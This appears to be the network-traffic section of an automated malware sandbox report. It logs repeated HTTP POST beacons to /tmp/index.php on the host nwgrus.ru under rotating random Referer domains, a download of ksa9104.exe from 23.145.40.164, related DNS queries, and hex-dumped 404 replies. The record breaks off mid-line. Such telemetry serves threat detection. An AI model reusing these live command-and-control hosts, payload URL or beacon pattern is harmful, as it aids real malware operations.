Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qvliyttnwva.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lcuvnbvrwwue.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xabseqytshw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bimvjobubxq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rxrarkndhoucempk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pkknpuucklp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pegvelqjknxdu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cgelocrsuxurnrn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xggjjjlvylvfsyxm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dpiicsehdjnbnsmw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rustqqxkqobo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fvvqfcjwkkyq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jskfymbttqm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nfmmhijnsahycef.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gmtmmuxeespeb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oetcuqsferjcffw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ykmrlqvmvtweyurg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://htfrpafyilhcsfrb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uphnbpophmmckayq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wygnfgjkntpabtiq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vhkqchnxwnhum.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nscyrydfuavfv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cktuxsueygng.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dxcesnnxlrm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rdmqecpndyox.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lqwauqujlltwos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uciyasnlqtuqe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ansjcylnamd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xcmbohrajfpmnq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://elwljkaryvt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ctivelvucvmgu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://coulxlduqqt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pohgsixvlqwy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: nwgrus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: ninjahallnews.com
Source: global traffic	DNS traffic detected: DNS query: fallhandbat.com

Source: unknown

HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbokbuwfpvoxbkg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: nwgrus.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 20:28:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the 